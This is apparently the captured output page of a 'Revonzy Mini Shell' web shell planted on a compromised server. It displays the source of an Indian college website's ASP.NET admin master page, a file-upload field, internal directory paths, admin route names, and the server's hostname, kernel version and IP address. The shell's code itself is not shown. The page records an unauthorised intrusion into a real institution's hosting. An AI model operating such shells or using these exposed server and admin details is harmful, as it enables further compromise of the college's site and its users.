Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/uesmahilamahavidyalaya.org/old/Views/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/uesmahilamahavidyalaya.org/old/Views/AdminMasterPage.Master

<%@ Master Language="C#" Inherits="System.Web.Mvc.ViewMasterPage" %>

<!DOCTYPE html>

<html>
<head runat="server">
    <%--<title></title>--%>
    <%--<title></title>--%>

    <meta name="viewport" content="width=device-width" />
    <title><asp:ContentPlaceHolder ID="TitleContent" runat="server" /></title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="keywords" content="Urdu Mela Jobs" />
 <script type="application/x-javascript">
        addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false);
               function hideURLbar(){ window.scrollTo(0,1); } </script>
    <!-- //for-mobile-apps -->
    <link href="../Content/css/bootstrap.css" rel="stylesheet" type="text/css" media="all" />
    <link href="../Content/css/style.css" rel="stylesheet" type="text/css" media="all" />
    <link class="include" rel="stylesheet" type="text/css" href="../Content/css/jquery.jqplot.css" />
    <!-- calender -->
    <link type="text/css" href="../Content/css/jquery.simple-dtpicker.css" rel="stylesheet" />
    <!-- //calender -->
    <!-- different-chart-bar -->
    <link rel="stylesheet" href="../Content/css/chart.min.css">
    <!-- //different-chart-bar -->
    <!-- font-awesome icons -->
    <link rel="stylesheet" href="../Content/css/font-awesome.min.css" />
    <!-- //font-awesome icons -->
    <!-- js -->
    <script src="../Content/js/jquery-1.11.1.min.js"></script>
    <script type="text/javascript" src="../Content/js/jquery.marquee.min.js"></script>
    <!-- js -->
    <!-- pop-up -->
    <link href="../Content/css/popuo-box.css" rel="stylesheet" type="text/css" media="all" />
    <!-- //pop-up -->
    <!-- left-chart -->
    <script src="../Content/js/jquery.flot.min.js" type="text/javascript"></script>
    <script src="../Content/js/jquery.flot.animator.min.js" type="text/javascript"></script>
    <!-- start-smoth-scrolling -->
    <script type="text/javascript" src="../Content/js/move-top.js"></script>
    <script type="text/javascript" src="../Content/js/easing.js"></script>
    <script type="text/javascript">
        jQuery(document).ready(function ($) {
            $(".scroll").click(function (event) {
                event.preventDefault();
                $('html,body').animate({ scrollTop: $(this.hash).offset().top }, 1000);
            });
        });
    </script>
    <!-- start-smoth-scrolling -->
    <style>
        blink {
            animation: blinker 0.6s linear infinite;
        }

        @keyframes blinker {
            50% {
                opacity: 0;
            }
        }

        .blink-one {
            animation: blinker-one 1s linear infinite;
        }

        @keyframes blinker-one {
            0% {
                opacity: 0;
            }
        }

        .blink-two {
            animation: blinker-two 1.4s linear infinite;
        }

        @keyframes blinker-one {
            100% {
                opacity: 0;
            }
        }
    </style>

    <style>
        .menu .navbar a {
            font-size: 14px;
        }

        nav {
            display: block;
            text-align: center;
        }

            nav ul {
                margin: 0;
                padding: 0;
                list-style: none;
            }

        .nav a {
            display: block;
            background: #80004a;
            color: #fff;
            text-decoration: none;
            padding: 10px 16px;
            text-transform: uppercase;
            font-size: 80%;
            letter-spacing: 2px;
            text-shadow: 0 -1px 0 #000;
            position: relative;
        }

        .nav {
            vertical-align: top;
            display: inline-block;
            box-shadow: 1px -1px -1px 1px #000, -1px 1px -1px 1px #fff, 0 0 6px 3px #fff;
            border-radius: 6px;
        }

            .nav li {
                position: relative;
            }

            .nav > li {
                float: left;
                border-bottom: 4px #aaa solid;
                margin-right: 1px;
            }

                .nav > li > a {
                    margin-bottom: 1px;
                    box-shadow: inset 0 2em .33em -0.5em #555;
                }

                .nav > li:hover,
                .nav > li:hover > a {
                    border-bottom-color: orange;
                }

            .nav li:hover > a {
                color: orange;
            }

            .nav > li:first-child {
                border-radius: 4px 0 0 4px;
            }

                .nav > li:first-child > a {
                    border-radius: 4px 0 0 0;
                }

            .nav > li:last-child {
                border-radius: 0 0 4px 0;
                margin-right: 0;
            }

                .nav > li:last-child > a {
                    border-radius: 0 4px 0 0;
                }

            .nav li li a {
                margin-top: 1px;
            }

            .nav li a:first-child:nth-last-child(2):before {
                content: "";
                position: absolute;
                height: 0;
                width: 0;
                border: 5px solid transparent;
                top: 50%;
                right: 5px;
            }
            /* submenu positioning*/
            .nav ul {
                position: absolute;
                white-space: nowrap;
                border-bottom: 5px solid orange;
                z-index: 1;
                left: -99999em;
            }

            .nav > li:hover > ul {
                left: auto;
                margin-top: 5px;
                min-width: 100%;
            }

            .nav > li li:hover > ul {
                left: 100%;
                margin-left: 1px;
                top: -1px;
            }
            /* arrow hover styling */
            .nav > li > a:first-child:nth-last-child(2):before {
                border-top-color: #aaa;
            }

            .nav > li:hover > a:first-child:nth-last-child(2):before {
                border: 5px solid transparent;
                border-bottom-color: orange;
                margin-top: -5px;
            }

            .nav li li > a:first-child:nth-last-child(2):before {
                border-left-color: #aaa;
                margin-top: -5px;
            }

            .nav li li:hover > a:first-child:nth-last-child(2):before {
                border: 5px solid transparent;
                border-right-color: orange;
                right: 10px;
            }
    body,td,th {
	color: #F0F0F0;
}
body {
	background-color: #FFFFE1;
}
</style>

</head>
<body>
    <div class="header">
        <div class="w3ls_header_top">
            <div class="container">
                <div class="w3l_header_left">
                    <ul class="w3layouts_header">
                        <li class="w3layouts_header_list">
                            <a href="#">FOLLOW US </a><img src="../Content/sm icon/google-plus.png" height="25px" width="25px" title="UES Mahila Mahavidyalaya Solapur" /> <img src="../Content/sm icon/lin.png" height="25px" width="25px" title="UES Mahila Mahavidyalaya Solapur" /> <img src="../Content/sm icon/fb.png" height="25px" width="25px" title="UES Mahila Mahavidyalaya Solapur" />  <img src="../Content/sm icon/TWEETER.png" height="25px" width="25px" title="UES Mahila Mahavidyalaya Solapur" /> <img src="../Content/sm icon/youtube.png" height="25px" width="25px" title="UES Mahila Mahavidyalaya Solapur" />
                        </li>
                     </ul>
                </div>
                <div class="w3l_header_right">
                    <h2 style="display: inline;"><i class="glyphicon glyphicon-phone-alt" aria-hidden="true"></i>+(91) 0217 -2624433  |<span style="display: inline; color:#FFFFFF">Welcome Admin <a href="/Main/Index" style="color:#FFFFFF">|  Logout</a>  |  <a href="#" style="color:#FFFFFF">Site Map</a></span></h2>
                </div>
                <div class="clearfix">
				 </div>
            </div>
        </div>
        <div class="w3ls_header_middle" style="background-color:#">
            <div class="container">
                <div class="#">
				 <div class="col-md-1 col-sm-1"><img src="../Content/images/uesmmlogo.png" style=""></div>
				  <div class="col-md-11 col-sm-11">
                    <b style="font-family:'Times New Roman',Times, serif; margin-left:15px; color:#008000">Union Education Society's</b>
                   <p> <h1 style="style="display:inline;  ><a href="#" style="font-family:'Bookman Old Style', Times New Roman, Times, serif; font-size:40px; color:#ff0696; margin-left:15px">MAHILA  MAHAVIDYALAYA<i><span style="display: inline;">  <h4  style="font-family:'Times New Roman',Times, serif; display:inline; color:#0000A0">Senior College of Arts, Solapur </h4></span> </i></a></h1></p>
                    <b style="font-family:'Times New Roman',Times, serif; margin-left:15px; color:#008000">Affiliated to Punyashlok Ahilyadevi Holkar Solapur University </b>
					<span class="style1">
					<marquee style="padding:2px; margin-bottom:-5px;  text-transform:uppercase; margin-top:-10px; color:#0000A0" behavior="alternate" direction="right" onMouseOver="this.stop();" onMouseOut="this.start();" scrollamount="3">
                    <a href="#" target="_blank" style="color:#6F4E37" >Union Education society's Mahila Mahavidyalaya Established on 13 July 1989 </a>
                    </marquee>
					</span>					</div>
                </div>
                <div class="clearfix"> </div>
            </div>
        </div>
        <style>       
         hr.news5
         {
            border:10px solid #ea0e52;
            border-radius:3px;
         }
    </style>
	<hr class="news5" />

    </div>
    <!-- //header -->
<!-- navigation -->
    

  <div class="banner-bottom">
        <div class="container">
                        <div>


                <div class="col-md-3 col-sm-3">
                    <div class="alert alert-warning">
<strong>Quick Links</strong>
</div>
<div class="bg-warning" style="float:left; width:255px;">
                            <div>
                                     <div style="text-align:left">
									 <%--<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:5px; margin-left:10px; ">&#x2756;  Examination & Result <img src="../Content/images/UESNew.gif" /> </a>--%>

                        <a href="/Main/NewFaculty"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Add Faculty </a>

                        <a href="/Main/NewAC"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add Academic Calendar</a>
                        <a href="/Main/NewAQAR"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add AQAR</a>
                        <a href="/Main/NewAQAR_SupFile"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add Supporting File</a>
                        <a href="/Main/NewCollegeMagazine"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; College Magazine</a>
                        <a href="/Main/NewIQACMinutes_ATR" style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; IQAC Minutes & ATR</a> <br><br>
                        <a href="/Main/NewFeedback" style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add Feedback (SSS)</a> <br><br>
                        <a href="/Main/NewAISHE" style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add AISHE Files</a> <br><br>
               
                                           <a href="/Main/NewYwSfs" style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add Year wise Supporting Files</a> <br><br>
                <a href="/Main/NewGallery" style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add Event Photos</a> <br><br>
                                            <a href="/Main/NewGalleryPC" style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add Paper Cutting</a> <br><br>
                                          <a href="/Main/NewQualitative" style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add Qualitative Data</a> <br><br>
 <a href="/Main/NewQuantitative" style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px;">&#x2756; Add Quantative Data</a> <br><br>

               
                                          <%--  
                                          <%--                <a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333; margin-left:15px;  margin-top:10px;">&#x2756; Sports</a>
                        <a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333; margin-left:15px;  margin-top:10px;">&#x2756; Time Table</a>
                        <a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333; margin-left:15px;    margin-top:10px;">&#x2756; College Prospectus</a>
                        <a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333; margin-left:15px;  margin-top:10px;">&#x2756; Internal Assessment</a>
                        <a href="#" style="float:left; width:280px; border-bottom:0px; color:#333; margin-left:15px;  margin-top:10px;">&#x2756; Alumni Association</a>
         				<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Academic Calendar</a>
<a href="/Main/UESMM_Faculty"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Staff List</a>
<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Urdu Department</a>
<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Statutory Committees</a>

<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Internal Quality Assurance Cell</a>
<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Infrastructure</a>

<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Student Activities</a>
<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Scholarships</a>

<a href="#"  style="float:left; width:280px; border-bottom:0px; color:#333;  margin-top:15px; margin-left:10px; ">&#x2756;  Admission Procedure</a>--%>
<br /><br />
		 			
                    </div>
                            </div>
                        </div>
       </div>

                           <%-- 9881908526--%>

                <div class="col-md-9 col-sm-9">
 <div> <asp:ContentPlaceHolder ID="MainContent" runat="server">
        
        </asp:ContentPlaceHolder>

 </div>
                </div>
                      </div>
  </div>   
      </div>
<!-- footer -->
	<div class="footer">
		<div class="container">
			<%--<ul class="agileits_w3layouts_footer_info">
				<li><a href="#">Home</a><i>|</i></li>
				<li><a href="#">ABOUT US </a><i>|</i></li>
				<li><a href="#">NEWS</a><i>|</i></li>
				<li><a href="#">CONTACT us </a><i></i></li>
				<!--<li><a href="portfolio.html">portfolio</a><i>|</i></li>
				<li><a href="about.html">About Us</a><i>|</i></li>
				<li><a href="ipo.html">IPO</a><i>|</i></li>
				<li><a href="sitemap.html">sitemap</a></li> -->
			</ul>--%>
			<p>© 2019 UES Mahila Mahavidyalaya. All rights reserved </p>
		</div>
	</div>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4